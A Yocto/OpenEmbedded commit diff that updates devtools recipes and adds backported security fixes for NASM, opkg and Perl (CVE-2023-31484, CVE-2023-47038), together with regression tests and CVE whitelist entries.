47+ {"debug-prefix-map", OPT_DEBUG_PREFIX_MAP, true, 0}, 45+ {"debug-prefix-map", OPT_DEBUG_PREFIX_MAP, true, 0},
46 {"reproducible", OPT_REPRODUCIBLE, ARG_NO, 0},
48 {NULL, OPT_BOGUS, ARG_NO, 0} 47 {NULL, OPT_BOGUS, ARG_NO, 0}
49 }; 48 };
50 49@@ -1337,6 +1339,26 @@ static bool process_arg(char *p, char *q, int pass)
51@@ -1332,6 +1334,26 @@ static bool process_arg(char *p, char *q, int pass) 50 case OPT_REPRODUCIBLE:
52 case OPT_DEBUG: 51 reproducible = true;
53 debug_nasm = param ? strtoul(param, NULL, 10) : debug_nasm+1;
54 break; 52 break;
55+ case OPT_DEBUG_PREFIX_MAP: { 53+ case OPT_DEBUG_PREFIX_MAP: {
56+ struct debug_prefix_list *d; 54+ struct debug_prefix_list *d;
@@ -75,7 +73,7 @@ index a0e1719..fc6c62e 100644
75 case OPT_HELP: 73 case OPT_HELP:
76 help(stdout); 74 help(stdout);
77 exit(0); 75 exit(0);
78@@ -2297,6 +2319,8 @@ static void help(FILE *out) 76@@ -2304,6 +2326,8 @@ static void help(FILE *out)
79 " -w-x disable warning x (also -Wno-x)\n" 77 " -w-x disable warning x (also -Wno-x)\n"
80 " -w[+-]error promote all warnings to errors (also -Werror)\n" 78 " -w[+-]error promote all warnings to errors (also -Werror)\n"
81 " -w[+-]error=x promote warning x to errors (also -Werror=x)\n" 79 " -w[+-]error=x promote warning x to errors (also -Werror=x)\n"
@@ -85,7 +83,7 @@ index a0e1719..fc6c62e 100644
85 83
86 fprintf(out, " %-20s %s\n", 84 fprintf(out, " %-20s %s\n",
87diff --git a/include/nasmlib.h b/include/nasmlib.h 85diff --git a/include/nasmlib.h b/include/nasmlib.h
88index e9bfbcc..98fc653 100644 86index 438178d..4c3e90d 100644
89--- a/include/nasmlib.h 87--- a/include/nasmlib.h
90+++ b/include/nasmlib.h 88+++ b/include/nasmlib.h
91@@ -250,10 +250,19 @@ int64_t readstrnum(char *str, int length, bool *warn); 89@@ -250,10 +250,19 @@ int64_t readstrnum(char *str, int length, bool *warn);
@@ -181,10 +179,10 @@ index 54b22f8..c4a412c 100644
181 179
182 static void as86_cleanup(void) 180 static void as86_cleanup(void)
183diff --git a/output/outcoff.c b/output/outcoff.c 181diff --git a/output/outcoff.c b/output/outcoff.c
184index bcd9ff3..15bfcf3 100644 182index 58fa024..14baf7b 100644
185--- a/output/outcoff.c 183--- a/output/outcoff.c
186+++ b/output/outcoff.c 184+++ b/output/outcoff.c
187@@ -1095,14 +1095,14 @@ static void coff_symbol(char *name, int32_t strpos, int32_t value, 185@@ -1072,14 +1072,14 @@ static void coff_symbol(char *name, int32_t strpos, int32_t value,
188 186
189 static void coff_write_symbols(void) 187 static void coff_write_symbols(void)
190 { 188 {
@@ -215,7 +213,7 @@ index 61af020..1292958 100644
215 nsects = sectlen = 0; 213 nsects = sectlen = 0;
216 syms = saa_init((int32_t)sizeof(struct elf_symbol)); 214 syms = saa_init((int32_t)sizeof(struct elf_symbol));
217diff --git a/output/outieee.c b/output/outieee.c 215diff --git a/output/outieee.c b/output/outieee.c
218index 4cc0f0f..2468724 100644 216index 6d6d4b2..cdb8333 100644
219--- a/output/outieee.c 217--- a/output/outieee.c
220+++ b/output/outieee.c 218+++ b/output/outieee.c
221@@ -207,7 +207,7 @@ static void ieee_unqualified_name(char *, char *); 219@@ -207,7 +207,7 @@ static void ieee_unqualified_name(char *, char *);
@@ -228,10 +226,10 @@ index 4cc0f0f..2468724 100644
228 fpubhead = NULL; 226 fpubhead = NULL;
229 fpubtail = &fpubhead; 227 fpubtail = &fpubhead;
230diff --git a/output/outobj.c b/output/outobj.c 228diff --git a/output/outobj.c b/output/outobj.c
231index 0d4d311..d8dd6a0 100644 229index 56b43f9..fefea94 100644
232--- a/output/outobj.c 230--- a/output/outobj.c
233+++ b/output/outobj.c 231+++ b/output/outobj.c
234@@ -638,7 +638,7 @@ static enum directive_result obj_directive(enum directive, char *); 232@@ -644,7 +644,7 @@ static enum directive_result obj_directive(enum directive, char *);
235 233
236 static void obj_init(void) 234 static void obj_init(void)
237 { 235 {
diff --git a/meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch b/meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch
new file mode 100644
index 0000000000..1bd49c9fd9
--- /dev/null
+++ b/meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch
@@ -0,0 +1,104 @@
1From b37677f7e40276bd8f504584bcba2c092f1146a8 Mon Sep 17 00:00:00 2001
2From: "H. Peter Anvin" <hpa@zytor.com>
3Date: Mon, 7 Nov 2022 10:26:03 -0800
4Subject: [PATCH] quote_for_pmake: fix counter underrun resulting in segfault
5
6while (nbs--) { ... } ends with nbs == -1. Rather than a minimal fix,
7introduce mempset() to make these kinds of errors less likely in the
8future.
9
10Fixes: https://bugzilla.nasm.us/show_bug.cgi?id=3392815
11Reported-by: <13579and24680@gmail.com>
12Signed-off-by: H. Peter Anvin <hpa@zytor.com>
13
14Upstream-Status: Backport
15CVE: CVE-2022-4437
16
17Reference to upstream patch:
18[https://github.com/netwide-assembler/nasm/commit/2d4e6952417ec6f08b6f135d2b5d0e19b7dae30d]
19
20Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com>
21---
22 asm/nasm.c | 12 +++++-------
23 configure.ac | 1 +
24 include/compiler.h | 7 +++++++
25 3 files changed, 13 insertions(+), 7 deletions(-)
26
27diff --git a/asm/nasm.c b/asm/nasm.c
28index 7a7f8b4..675cff4 100644
29--- a/asm/nasm.c
30+++ b/asm/nasm.c
31@@ -1,6 +1,6 @@
32 /* ----------------------------------------------------------------------- *
33 *
34- * Copyright 1996-2020 The NASM Authors - All Rights Reserved
35+ * Copyright 1996-2022 The NASM Authors - All Rights Reserved
36 * See the file AUTHORS included with the NASM distribution for
37 * the specific copyright holders.
38 *
39@@ -814,8 +814,7 @@ static char *quote_for_pmake(const char *str)
40 }
41
42 /* Convert N backslashes at the end of filename to 2N backslashes */
43- if (nbs)
44- n += nbs;
45+ n += nbs;
46
47 os = q = nasm_malloc(n);
48
49@@ -824,10 +823,10 @@ static char *quote_for_pmake(const char *str)
50 switch (*p) {
51 case ' ':
52 case '\t':
53- while (nbs--)
54- *q++ = '\\';
55+ q = mempset(q, '\\', nbs);
56 *q++ = '\\';
57 *q++ = *p;
58+ nbs = 0;
59 break;
60 case '$':
61 *q++ = *p;
62@@ -849,9 +848,8 @@ static char *quote_for_pmake(const char *str)
63 break;
64 }
65 }
66- while (nbs--)
67- *q++ = '\\';
68
69+ q = mempset(q, '\\', nbs);
70 *q = '\0';
71
72 return os;
73diff --git a/configure.ac b/configure.ac
74index 39680b1..940ebe2 100644
75--- a/configure.ac
76+++ b/configure.ac
77@@ -199,6 +199,7 @@ AC_CHECK_FUNCS(strrchrnul)
78 AC_CHECK_FUNCS(iscntrl)
79 AC_CHECK_FUNCS(isascii)
80 AC_CHECK_FUNCS(mempcpy)
81+AC_CHECK_FUNCS(mempset)
82
83 AC_CHECK_FUNCS(getuid)
84 AC_CHECK_FUNCS(getgid)
85diff --git a/include/compiler.h b/include/compiler.h
86index db3d6d6..b64da6a 100644
87--- a/include/compiler.h
88+++ b/include/compiler.h
89@@ -256,6 +256,13 @@ static inline void *mempcpy(void *dst, const void *src, size_t n)
90 }
91 #endif
92
93+#ifndef HAVE_MEMPSET
94+static inline void *mempset(void *dst, int c, size_t n)
95+{
96+ return (char *)memset(dst, c, n) + n;
97+}
98+#endif
99+
100 /*
101 * Hack to support external-linkage inline functions
102 */
103--
1042.40.0
diff --git a/meta/recipes-devtools/nasm/nasm_2.15.03.bb b/meta/recipes-devtools/nasm/nasm_2.15.05.bb
index 5c4e28de06..c5638debdd 100644
--- a/meta/recipes-devtools/nasm/nasm_2.15.03.bb
+++ b/meta/recipes-devtools/nasm/nasm_2.15.05.bb
@@ -1,18 +1,21 @@
1SUMMARY = "General-purpose x86 assembler" 1SUMMARY = "General-purpose x86 assembler"
2SECTION = "devel" 2SECTION = "devel"
3HOMEPAGE = "http://www.nasm.us/"
4DESCRIPTION = "The Netwide Assembler (NASM) is an assembler and disassembler for the Intel x86 architecture."
3LICENSE = "BSD-2-Clause" 5LICENSE = "BSD-2-Clause"
4LIC_FILES_CHKSUM = "file://LICENSE;md5=90904486f8fbf1861cf42752e1a39efe" 6LIC_FILES_CHKSUM = "file://LICENSE;md5=90904486f8fbf1861cf42752e1a39efe"
5 7
6SRC_URI = "http://www.nasm.us/pub/nasm/releasebuilds/${PV}/nasm-${PV}.tar.bz2 \ 8SRC_URI = "http://www.nasm.us/pub/nasm/releasebuilds/${PV}/nasm-${PV}.tar.bz2 \
7 file://0001-stdlib-Add-strlcat.patch \ 9 file://0001-stdlib-Add-strlcat.patch \
8 file://0002-Add-debug-prefix-map-option.patch \ 10 file://0002-Add-debug-prefix-map-option.patch \
11 file://CVE-2022-44370.patch \
9 " 12 "
10 13
11SRC_URI[sha256sum] = "04e7343d9bf112bffa9fda86f6c7c8b120c2ccd700b882e2db9f57484b1bd778" 14SRC_URI[sha256sum] = "3c4b8339e5ab54b1bcb2316101f8985a5da50a3f9e504d43fa6f35668bee2fd0"
12 15
13EXTRA_AUTORECONF_append = " -I autoconf/m4" 16EXTRA_AUTORECONF_append = " -I autoconf/m4"
14 17
15inherit autotools 18inherit autotools-brokensep
16 19
17BBCLASSEXTEND = "native" 20BBCLASSEXTEND = "native"
18 21
diff --git a/meta/recipes-devtools/ninja/ninja_1.10.0.bb b/meta/recipes-devtools/ninja/ninja_1.10.0.bb
index ba3398c5d6..755b73a173 100644
--- a/meta/recipes-devtools/ninja/ninja_1.10.0.bb
+++ b/meta/recipes-devtools/ninja/ninja_1.10.0.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Ninja is a small build system with a focus on speed." 1SUMMARY = "Ninja is a small build system with a focus on speed."
2HOMEPAGE = "https://ninja-build.org/" 2HOMEPAGE = "https://ninja-build.org/"
3DESCRIPTION = "Ninja is a small build system with a focus on speed. It differs from other build systems in two major respects: it is designed to have its input files generated by a higher-level build system, and it is designed to run builds as fast as possible."
3LICENSE = "Apache-2.0" 4LICENSE = "Apache-2.0"
4LIC_FILES_CHKSUM = "file://COPYING;md5=a81586a64ad4e476c791cda7e2f2c52e" 5LIC_FILES_CHKSUM = "file://COPYING;md5=a81586a64ad4e476c791cda7e2f2c52e"
5 6
@@ -7,7 +8,7 @@ DEPENDS = "re2c-native ninja-native"
7 8
8SRCREV = "ed7f67040b370189d989adbd60ff8ea29957231f" 9SRCREV = "ed7f67040b370189d989adbd60ff8ea29957231f"
9 10
10SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release" 11SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release;protocol=https"
11UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)" 12UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)"
12 13
13S = "${WORKDIR}/git" 14S = "${WORKDIR}/git"
@@ -28,3 +29,6 @@ do_install() {
28} 29}
29 30
30BBCLASSEXTEND = "native nativesdk" 31BBCLASSEXTEND = "native nativesdk"
32
33# This is a different Ninja
34CVE_CHECK_WHITELIST += "CVE-2021-4336"
diff --git a/meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch b/meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch
new file mode 100644
index 0000000000..bec21e67f4
--- /dev/null
+++ b/meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch
@@ -0,0 +1,50 @@
1From 8b45a3c4cab95382beea1ecdddeb2e4a9ed14aba Mon Sep 17 00:00:00 2001
2From: Jo-Philipp Wich <jo@mein.io>
3Date: Wed, 1 Apr 2020 21:47:40 +0200
4Subject: [PATCH 001/104] file_util.c: fix possible bad memory access in
5 file_read_line_alloc()
6
7In the case of a zero length string being returned by fgets(), the condition
8checking for a trailing new line would perform a bad memory access outside
9of `buf`. This might happen when line with a leading null byte is read.
10
11Avoid this case by checking that the string has a length of at least one
12byte. Also change the unsigned int types to size_t to store length values
13while we're at it.
14
15Upstream-Status: Backport [https://github.com/ndmsystems/opkg/commit/8b45a3c4cab95382beea1ecdddeb2e4a9ed14aba]
16
17Signed-off-by: Jo-Philipp Wich <jo@mein.io>
18Signed-off-by: Alejandro del Castillo <alejandro.delcastillo@ni.com>
19Signed-off-by: virendra thakur <virendrak@kpit.com>
20---
21 libopkg/file_util.c | 7 ++-----
22 1 file changed, 2 insertions(+), 5 deletions(-)
23
24diff --git a/libopkg/file_util.c b/libopkg/file_util.c
25index fbed7b4..ee9f59d 100644
26--- a/libopkg/file_util.c
27+++ b/libopkg/file_util.c
28@@ -127,17 +127,14 @@ char *file_readlink_alloc(const char *file_name)
29 */
30 char *file_read_line_alloc(FILE * fp)
31 {
32+ size_t buf_len, line_size;
33 char buf[BUFSIZ];
34- unsigned int buf_len;
35 char *line = NULL;
36- unsigned int line_size = 0;
37 int got_nl = 0;
38
39- buf[0] = '\0';
40-
41 while (fgets(buf, BUFSIZ, fp)) {
42 buf_len = strlen(buf);
43- if (buf[buf_len - 1] == '\n') {
44+ if (buf_len > 0 && buf[buf_len - 1] == '\n') {
45 buf_len--;
46 buf[buf_len] = '\0';
47 got_nl = 1;
48--
492.25.1
50
diff --git a/meta/recipes-devtools/opkg/opkg_0.4.2.bb b/meta/recipes-devtools/opkg/opkg_0.4.2.bb
index 516982c6f5..3ebc27c8ee 100644
--- a/meta/recipes-devtools/opkg/opkg_0.4.2.bb
+++ b/meta/recipes-devtools/opkg/opkg_0.4.2.bb
@@ -2,6 +2,7 @@ SUMMARY = "Open Package Manager"
2SUMMARY_libopkg = "Open Package Manager library" 2SUMMARY_libopkg = "Open Package Manager library"
3SECTION = "base" 3SECTION = "base"
4HOMEPAGE = "http://code.google.com/p/opkg/" 4HOMEPAGE = "http://code.google.com/p/opkg/"
5DESCRIPTION = "Opkg is a lightweight package management system based on Ipkg."
5BUGTRACKER = "http://code.google.com/p/opkg/issues/list" 6BUGTRACKER = "http://code.google.com/p/opkg/issues/list"
6LICENSE = "GPLv2+" 7LICENSE = "GPLv2+"
7LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f \ 8LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f \
@@ -15,6 +16,7 @@ SRC_URI = "http://downloads.yoctoproject.org/releases/${BPN}/${BPN}-${PV}.tar.gz
15 file://opkg.conf \ 16 file://opkg.conf \
16 file://0001-opkg_conf-create-opkg.lock-in-run-instead-of-var-run.patch \ 17 file://0001-opkg_conf-create-opkg.lock-in-run-instead-of-var-run.patch \
17 file://sourcedateepoch.patch \ 18 file://sourcedateepoch.patch \
19 file://0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch \
18 file://run-ptest \ 20 file://run-ptest \
19" 21"
20 22
@@ -49,7 +51,9 @@ EXTRA_OECONF_class-native = "--localstatedir=/${@os.path.relpath('${localstatedi
49do_install_append () { 51do_install_append () {
50 install -d ${D}${sysconfdir}/opkg 52 install -d ${D}${sysconfdir}/opkg
51 install -m 0644 ${WORKDIR}/opkg.conf ${D}${sysconfdir}/opkg/opkg.conf 53 install -m 0644 ${WORKDIR}/opkg.conf ${D}${sysconfdir}/opkg/opkg.conf
52 echo "option lists_dir ${OPKGLIBDIR}/opkg/lists" >>${D}${sysconfdir}/opkg/opkg.conf 54 echo "option lists_dir ${OPKGLIBDIR}/opkg/lists" >>${D}${sysconfdir}/opkg/opkg.conf
55 echo "option info_dir ${OPKGLIBDIR}/opkg/info" >>${D}${sysconfdir}/opkg/opkg.conf
56 echo "option status_file ${OPKGLIBDIR}/opkg/status" >>${D}${sysconfdir}/opkg/opkg.conf
53 57
54 # We need to create the lock directory 58 # We need to create the lock directory
55 install -d ${D}${OPKGLIBDIR}/opkg 59 install -d ${D}${OPKGLIBDIR}/opkg
diff --git a/meta/recipes-devtools/orc/orc_0.4.31.bb b/meta/recipes-devtools/orc/orc_0.4.31.bb
index cd4dc31d70..ba2c349c9f 100644
--- a/meta/recipes-devtools/orc/orc_0.4.31.bb
+++ b/meta/recipes-devtools/orc/orc_0.4.31.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Optimised Inner Loop Runtime Compiler" 1SUMMARY = "Optimised Inner Loop Runtime Compiler"
2HOMEPAGE = "http://gstreamer.freedesktop.org/modules/orc.html" 2HOMEPAGE = "http://gstreamer.freedesktop.org/modules/orc.html"
3DESCRIPTION = "Optimised Inner Loop Runtime Compiler is a Library and set of tools for compiling and executing SIMD assembly language-like programs that operate on arrays of data."
3LICENSE = "BSD-2-Clause & BSD-3-Clause" 4LICENSE = "BSD-2-Clause & BSD-3-Clause"
4LIC_FILES_CHKSUM = "file://COPYING;md5=1400bd9d09e8af56b9ec982b3d85797e" 5LIC_FILES_CHKSUM = "file://COPYING;md5=1400bd9d09e8af56b9ec982b3d85797e"
5 6
diff --git a/meta/recipes-devtools/patchelf/patchelf_0.10.bb b/meta/recipes-devtools/patchelf/patchelf_0.10.bb
index 84e640773b..2bf3108f88 100644
--- a/meta/recipes-devtools/patchelf/patchelf_0.10.bb
+++ b/meta/recipes-devtools/patchelf/patchelf_0.10.bb
@@ -1,12 +1,15 @@
1SRC_URI = "git://github.com/NixOS/patchelf;protocol=https \ 1SUMMARY = "Tool to allow editing of RPATH and interpreter fields in ELF binaries"
2DESCRIPTION = "PatchELF is a simple utility for modifying existing ELF executables and libraries."
3HOMEPAGE = "https://github.com/NixOS/patchelf"
4
5LICENSE = "GPLv3"
6
7SRC_URI = "git://github.com/NixOS/patchelf;protocol=https;branch=master \
2 file://handle-read-only-files.patch \ 8 file://handle-read-only-files.patch \
3 file://fix-adjusting-startPage.patch \ 9 file://fix-adjusting-startPage.patch \
4 file://fix-phdrs.patch \ 10 file://fix-phdrs.patch \
5 " 11 "
6 12
7LICENSE = "GPLv3"
8SUMMARY = "Tool to allow editing of RPATH and interpreter fields in ELF binaries"
9
10SRCREV = "e1e39f3639e39360ceebb2f7ed533cede4623070" 13SRCREV = "e1e39f3639e39360ceebb2f7ed533cede4623070"
11 14
12S = "${WORKDIR}/git" 15S = "${WORKDIR}/git"
diff --git a/meta/recipes-devtools/perl/files/CVE-2023-31484.patch b/meta/recipes-devtools/perl/files/CVE-2023-31484.patch
new file mode 100644
index 0000000000..0fea7bf8a8
--- /dev/null
+++ b/meta/recipes-devtools/perl/files/CVE-2023-31484.patch
@@ -0,0 +1,27 @@
1CVE: CVE-2023-31484
2Upstream-Status: Backport [ import from Ubuntu perl_5.30.0-9ubuntu0.5
3upstream https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 ]
4Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
5
6From 9c98370287f4e709924aee7c58ef21c85289a7f0 Mon Sep 17 00:00:00 2001
7From: Stig Palmquist <git@stig.io>
8Date: Tue, 28 Feb 2023 11:54:06 +0100
9Subject: [PATCH] Add verify_SSL=>1 to HTTP::Tiny to verify https server
10 identity
11
12---
13 lib/CPAN/HTTP/Client.pm | 1 +
14 1 file changed, 1 insertion(+)
15
16diff --git a/cpan/CPAN/lib/CPAN/HTTP/Client.pm b/cpan/CPAN/lib/CPAN/HTTP/Client.pm
17index 4fc792c26..a616fee20 100644
18--- a/cpan/CPAN/lib/CPAN/HTTP/Client.pm
19+++ b/cpan/CPAN/lib/CPAN/HTTP/Client.pm
20@@ -32,6 +32,7 @@ sub mirror {
21
22 my $want_proxy = $self->_want_proxy($uri);
23 my $http = HTTP::Tiny->new(
24+ verify_SSL => 1,
25 $want_proxy ? (proxy => $self->{proxy}) : ()
26 );
27
diff --git a/meta/recipes-devtools/perl/files/CVE-2023-47038.patch b/meta/recipes-devtools/perl/files/CVE-2023-47038.patch
new file mode 100644
index 0000000000..59252c560c
--- /dev/null
+++ b/meta/recipes-devtools/perl/files/CVE-2023-47038.patch
@@ -0,0 +1,121 @@
1as per https://ubuntu.com/security/CVE-2023-47100 , CVE-2023-47100 is duplicate of CVE-2023-47038
2CVE: CVE-2023-47038 CVE-2023-47100
3Upstream-Status: Backport [ import from ubuntu perl_5.30.0-9ubuntu0.5
4upstream https://github.com/Perl/perl5/commit/12c313ce49b36160a7ca2e9b07ad5bd92ee4a010 ]
5Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
6
7Backport of:
8
9From 12c313ce49b36160a7ca2e9b07ad5bd92ee4a010 Mon Sep 17 00:00:00 2001
10From: Karl Williamson <khw@cpan.org>
11Date: Sat, 9 Sep 2023 11:59:09 -0600
12Subject: [PATCH 1/2] Fix read/write past buffer end: perl-security#140
13
14A package name may be specified in a \p{...} regular expression
15construct. If unspecified, "utf8::" is assumed, which is the package
16all official Unicode properties are in. By specifying a different
17package, one can create a user-defined property with the same
18unqualified name as a Unicode one. Such a property is defined by a sub
19whose name begins with "Is" or "In", and if the sub wishes to refer to
20an official Unicode property, it must explicitly specify the "utf8::".
21S_parse_uniprop_string() is used to parse the interior of both \p{} and
22the user-defined sub lines.
23
24In S_parse_uniprop_string(), it parses the input "name" parameter,
25creating a modified copy, "lookup_name", malloc'ed with the same size as
26"name". The modifications are essentially to create a canonicalized
27version of the input, with such things as extraneous white-space
28stripped off. I found it convenient to strip off the package specifier
29"utf8::". To to so, the code simply pretends "lookup_name" begins just
30after the "utf8::", and adjusts various other values to compensate.
31However, it missed the adjustment of one required one.
32
33This is only a problem when the property name begins with "perl" and
34isn't "perlspace" nor "perlword". All such ones are undocumented
35internal properties.
36
37What happens in this case is that the input is reparsed with slightly
38different rules in effect as to what is legal versus illegal. The
39problem is that "lookup_name" no longer is pointing to its initial
40value, but "name" is. Thus the space allocated for filling "lookup_name"
41is now shorter than "name", and as this shortened "lookup_name" is
42filled by copying suitable portions of "name", the write can be to
43unallocated space.
44
45The solution is to skip the "utf8::" when reparsing "name". Then both
46"lookup_name" and "name" are effectively shortened by the same amount,
47and there is no going off the end.
48
49This commit also does white-space adjustment so that things align
50vertically for readability.
51
52This can be easily backported to earlier Perl releases.
53---
54 regcomp.c | 17 +++++++++++------
55 t/re/pat_advanced.t | 8 ++++++++
56 2 files changed, 19 insertions(+), 6 deletions(-)
57
58--- a/regcomp.c
59+++ b/regcomp.c
60@@ -22606,7 +22606,7 @@ Perl_parse_uniprop_string(pTHX_
61 * compile perl to know about them) */
62 bool is_nv_type = FALSE;
63
64- unsigned int i, j = 0;
65+ unsigned int i = 0, i_zero = 0, j = 0;
66 int equals_pos = -1; /* Where the '=' is found, or negative if none */
67 int slash_pos = -1; /* Where the '/' is found, or negative if none */
68 int table_index = 0; /* The entry number for this property in the table
69@@ -22717,9 +22717,13 @@ Perl_parse_uniprop_string(pTHX_
70 * all of them are considered to be for that package. For the purposes of
71 * parsing the rest of the property, strip it off */
72 if (non_pkg_begin == STRLENs("utf8::") && memBEGINPs(name, name_len, "utf8::")) {
73- lookup_name += STRLENs("utf8::");
74- j -= STRLENs("utf8::");
75- equals_pos -= STRLENs("utf8::");
76+ lookup_name += STRLENs("utf8::");
77+ j -= STRLENs("utf8::");
78+ equals_pos -= STRLENs("utf8::");
79+ i_zero = STRLENs("utf8::"); /* When resetting 'i' to reparse
80+ from the beginning, it has to be
81+ set past what we're stripping
82+ off */
83 }
84
85 /* Here, we are either done with the whole property name, if it was simple;
86@@ -22997,7 +23001,8 @@ Perl_parse_uniprop_string(pTHX_
87
88 /* We set the inputs back to 0 and the code below will reparse,
89 * using strict */
90- i = j = 0;
91+ i = i_zero;
92+ j = 0;
93 }
94 }
95
96@@ -23018,7 +23023,7 @@ Perl_parse_uniprop_string(pTHX_
97 * separates two digits */
98 if (cur == '_') {
99 if ( stricter
100- && ( i == 0 || (int) i == equals_pos || i == name_len- 1
101+ && ( i == i_zero || (int) i == equals_pos || i == name_len- 1
102 || ! isDIGIT_A(name[i-1]) || ! isDIGIT_A(name[i+1])))
103 {
104 lookup_name[j++] = '_';
105--- a/t/re/pat_advanced.t
106+++ b/t/re/pat_advanced.t
107@@ -2524,6 +2524,14 @@ EOF
108 "", {}, "*COMMIT caused positioning beyond EOS");
109 }
110
111+ { # perl-security#140, read/write past buffer end
112+ fresh_perl_like('qr/\p{utf8::perl x}/',
113+ qr/Illegal user-defined property name "utf8::perl x" in regex/,
114+ {}, "perl-security#140");
115+ fresh_perl_is('qr/\p{utf8::_perl_surrogate}/', "",
116+ {}, "perl-security#140");
117+ }
118+
119
120 # !!! NOTE that tests that aren't at all likely to crash perl should go
121 # a ways above, above these last ones. There's a comment there that, like
diff --git a/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb b/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb
index a6fd7b1c07..c91b44cd6e 100644
--- a/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb
+++ b/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb
@@ -37,6 +37,7 @@ EXTRA_CPAN_BUILD_FLAGS = "--create_packlist=0"
37 37
38do_install_append () { 38do_install_append () {
39 rm -rf ${D}${docdir}/perl/html 39 rm -rf ${D}${docdir}/perl/html
40 sed -i "s:^#!.*:#!/usr/bin/env perl:" ${D}${bindir}/config_data
40} 41}
41 42
42do_install_ptest() { 43do_install_ptest() {
diff --git a/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb b/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
index bc154bbdc5..ef2b292352 100644
--- a/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
+++ b/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
@@ -53,6 +53,7 @@ do_install_ptest() {
53 chown -R root:root ${D}${PTEST_PATH}/samples 53 chown -R root:root ${D}${PTEST_PATH}/samples
54} 54}
55 55
56RDEPENDS_${PN} += "perl-module-carp perl-module-file-spec"
56RDEPENDS_${PN}-ptest += "perl-module-filehandle perl-module-if perl-module-test perl-module-test-more" 57RDEPENDS_${PN}-ptest += "perl-module-filehandle perl-module-if perl-module-test perl-module-test-more"
57 58
58BBCLASSEXTEND="native nativesdk" 59BBCLASSEXTEND="native nativesdk"
diff --git a/meta/recipes-devtools/perl/perl_5.30.1.bb b/meta/recipes-devtools/perl/perl_5.30.1.bb
index ee6eb6ef0f..bf81a023b8 100644
--- a/meta/recipes-devtools/perl/perl_5.30.1.bb
+++ b/meta/recipes-devtools/perl/perl_5.30.1.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Perl scripting language" 1SUMMARY = "Perl scripting language"
2HOMEPAGE = "http://www.perl.org/" 2HOMEPAGE = "http://www.perl.org/"
3DESCRIPTION = "Perl is a highly capable, feature-rich programming language"
3SECTION = "devel" 4SECTION = "devel"
4LICENSE = "Artistic-1.0 | GPL-1.0+" 5LICENSE = "Artistic-1.0 | GPL-1.0+"
5LIC_FILES_CHKSUM = "file://Copying;md5=5b122a36d0f6dc55279a0ebc69f3c60b \ 6LIC_FILES_CHKSUM = "file://Copying;md5=5b122a36d0f6dc55279a0ebc69f3c60b \
@@ -28,6 +29,8 @@ SRC_URI = "https://www.cpan.org/src/5.0/perl-${PV}.tar.gz;name=perl \
28 file://CVE-2020-10878_1.patch \ 29 file://CVE-2020-10878_1.patch \
29 file://CVE-2020-10878_2.patch \ 30 file://CVE-2020-10878_2.patch \
30 file://CVE-2020-12723.patch \ 31 file://CVE-2020-12723.patch \
32 file://CVE-2023-31484.patch \
33 file://CVE-2023-47038.patch \
31 " 34 "
32SRC_URI_append_class-native = " \ 35SRC_URI_append_class-native = " \
33 file://perl-configpm-switch.patch \ 36 file://perl-configpm-switch.patch \
@@ -43,6 +46,10 @@ SRC_URI[perl-cross.sha256sum] = "edce0b0c2f725e2db3f203d6d8e9f3f7161256f5d159055
43 46
44S = "${WORKDIR}/perl-${PV}" 47S = "${WORKDIR}/perl-${PV}"
45 48
49# This is windows only issue.
50# https://ubuntu.com/security/CVE-2023-47039
51CVE_CHECK_WHITELIST += "CVE-2023-47039"
52
46inherit upstream-version-is-even update-alternatives 53inherit upstream-version-is-even update-alternatives
47 54
48DEPENDS += "zlib virtual/crypt" 55DEPENDS += "zlib virtual/crypt"
diff --git a/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb b/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb
index 52ef2a9779..7bf68082b2 100644
--- a/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb
+++ b/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb
@@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
11SRCREV = "edf8e6f0ea77ede073f07bff0d2ae1fc7a38103b" 11SRCREV = "edf8e6f0ea77ede073f07bff0d2ae1fc7a38103b"
12PV = "0.29.2+git${SRCPV}" 12PV = "0.29.2+git${SRCPV}"
13 13
14SRC_URI = "git://anongit.freedesktop.org/pkg-config \ 14SRC_URI = "git://gitlab.freedesktop.org/pkg-config/pkg-config.git;branch=master;protocol=https \
15 file://pkg-config-esdk.in \ 15 file://pkg-config-esdk.in \
16 file://pkg-config-native.in \ 16 file://pkg-config-native.in \
17 file://fix-glib-configure-libtool-usage.patch \ 17 file://fix-glib-configure-libtool-usage.patch \
diff --git a/meta/recipes-devtools/pseudo/files/build-oldlibc b/meta/recipes-devtools/pseudo/files/build-oldlibc
new file mode 100755
index 0000000000..85c438de4e
--- /dev/null
+++ b/meta/recipes-devtools/pseudo/files/build-oldlibc
@@ -0,0 +1,20 @@
1#!/bin/sh
2#
